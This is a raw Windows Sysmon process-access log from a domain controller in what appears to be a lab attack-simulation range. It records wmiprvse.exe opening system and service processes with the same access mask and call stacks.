15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 